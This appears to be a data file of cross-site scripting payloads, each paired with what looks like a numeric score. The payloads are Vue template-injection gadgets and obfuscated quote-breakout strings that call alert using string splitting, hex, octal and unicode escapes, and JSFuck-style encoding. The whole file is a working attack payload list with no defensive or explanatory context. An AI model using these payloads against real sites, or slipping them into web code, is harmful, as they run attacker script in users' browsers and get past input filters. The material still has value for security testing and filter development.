('<img src @error=e=$event.path.pop().alert(1)>\n', -1.4)
('<img src @error=e=$event.composedPath().pop().alert(1)>\n', -1.6)
('<img src @error=this.alert(1)>\n', -1.6)
('<svg@load=this.alert(1)>\n', -1.6)
('<p slot-scope="){}}])+this.constructor.constructor(\'alert(1)\')()})};//">\n', -1.5)
("{{_openBlock.constructor('alert(1)')()}}\n", -1.4)
("{{_createBlock.constructor('alert(1)')()}}\n", -1.4)
("{{_toDisplayString.constructor('alert(1)')()}}\n", -1.4)
("{{_createVNode.constructor('alert(1)')()}}\n", -1.4)
('<p v-show=_createBlock.constructor`alert(1)`()>\n', -1.4)
('<x @[_openBlock.constructor`alert(1)`()]>\n', -1.4)
('<x @[_capitalize.constructor`alert(1)`()]>\n', -2.4)
('<x @click=_withCtx.constructor`alert(1)`()>click</x>\n', -2.4)
('<x @click=$event.view.alert(1)>click</x>\n', -2.7)
('{{_Vue.h.constructor`alert(1)`()}}\n', -2.7)
('{{$emit.constructor`alert(1)`()}}\n', -1.4)
('<teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div><script></script>\n', -1.4)
('<teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div><script></script>\n', -2.8)
('<component is=script text=alert(1)>\n', None)
("';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//\n", -1.3)
("';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//\n", -0.4)
("';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//\n", -0.4)
("';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);//\n", -0.4)
("';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//\n", -0.4)
("';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);//\n", -0.4)
("';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//\n", -0.4)
("';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//\n", -0.4)
("';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//\n", -0.4)
("';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//\n", -0.4)
("';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);//\n", -0.4)
("';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//\n", -0.4)
("';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain']);//\n", -0.4)
("';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);//\n", -0.4)
("';window['\\x61\\x6c\\x65\\x72\\x74'](window['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);//\n", -0.4)
("';self['\\x61\\x6c\\x65\\x72\\x74'](self['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);//\n", -0.4)
("';this['\\x61\\x6c\\x65\\x72\\x74'](this['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);//\n", -0.4)
("';top['\\x61\\x6c\\x65\\x72\\x74'](top['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);//\n", -0.4)
("';parent['\\x61\\x6c\\x65\\x72\\x74'](parent['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);//\n", -0.4)
("';frames['\\x61\\x6c\\x65\\x72\\x74'](frames['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);//\n", -0.4)
("';globalThis['\\x61\\x6c\\x65\\x72\\x74'](globalThis['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);//\n", -0.4)
('\';window[\'\\x65\\x76\\x61\\x6c\'](\'window["\\x61\\x6c\\x65\\x72\\x74"](window["\\x61\\x74\\x6f\\x62"]("WFNT"))\');//\n', -0.4)
('\';self[\'\\x65\\x76\\x61\\x6c\'](\'self["\\x61\\x6c\\x65\\x72\\x74"](self["\\x61\\x74\\x6f\\x62"]("WFNT"))\');//\n', None)
('\';this[\'\\x65\\x76\\x61\\x6c\'](\'this["\\x61\\x6c\\x65\\x72\\x74"](this["\\x61\\x74\\x6f\\x62"]("WFNT"))\');//\n', -0.4)
('\';top[\'\\x65\\x76\\x61\\x6c\'](\'top["\\x61\\x6c\\x65\\x72\\x74"](top["\\x61\\x74\\x6f\\x62"]("WFNT"))\');//\n', -0.4)
('\';parent[\'\\x65\\x76\\x61\\x6c\'](\'parent["\\x61\\x6c\\x65\\x72\\x74"](parent["\\x61\\x74\\x6f\\x62"]("WFNT"))\');//\n', -0.4)
('\';frames[\'\\x65\\x76\\x61\\x6c\'](\'frames["\\x61\\x6c\\x65\\x72\\x74"](frames["\\x61\\x74\\x6f\\x62"]("WFNT"))\');//\n', None)
('\';globalThis[\'\\x65\\x76\\x61\\x6c\'](\'globalThis["\\x61\\x6c\\x65\\x72\\x74"](globalThis["\\x61\\x74\\x6f\\x62"]("WFNT"))\');//\n', -0.4)
("';window['\\141\\154\\145\\162\\164']('\\130\\123\\123');//\n", -0.4)
("';self['\\141\\154\\145\\162\\164']('\\130\\123\\123');//\n", -0.4)
("';this['\\141\\154\\145\\162\\164']('\\130\\123\\123');//\n", -0.4)
("';top['\\141\\154\\145\\162\\164']('\\130\\123\\123');//\n", -0.4)
("';parent['\\141\\154\\145\\162\\164']('\\130\\123\\123');//\n", -0.4)
("';frames['\\141\\154\\145\\162\\164']('\\130\\123\\123');//\n", -0.4)
("';globalThis['\\141\\154\\145\\162\\164']('\\130\\123\\123');//\n", -0.4)
("';window['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');//\n", -0.4)
("';self['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');//\n", -0.4)
("';this['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');//\n", -0.4)
("';top['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');//\n", -0.4)
("';parent['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');//\n", -0.4)
("';frames['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');//\n", -0.4)
("';globalThis['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');//\n", -0.4)
("';window[/al/.source+/ert/.source](/XSS/.source);//\n", -0.4)
("';self[/al/.source+/ert/.source](/XSS/.source);//\n", -0.4)
("';this[/al/.source+/ert/.source](/XSS/.source);//\n", -0.4)
("';top[/al/.source+/ert/.source](/XSS/.source);//\n", -0.4)
("';parent[/al/.source+/ert/.source](/XSS/.source);//\n", -0.4)
("';frames[/al/.source+/ert/.source](/XSS/.source);//\n", -0.4)
("';globalThis[/al/.source+/ert/.source](/XSS/.source);//\n", -0.4)
("';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//\n", -0.4)
("';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//\n", -0.4)
("';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//\n", None)
("';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//\n", -0.4)
("';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//\n", -0.4)
("';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//\n", -0.4)
("';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//\n", -0.4)
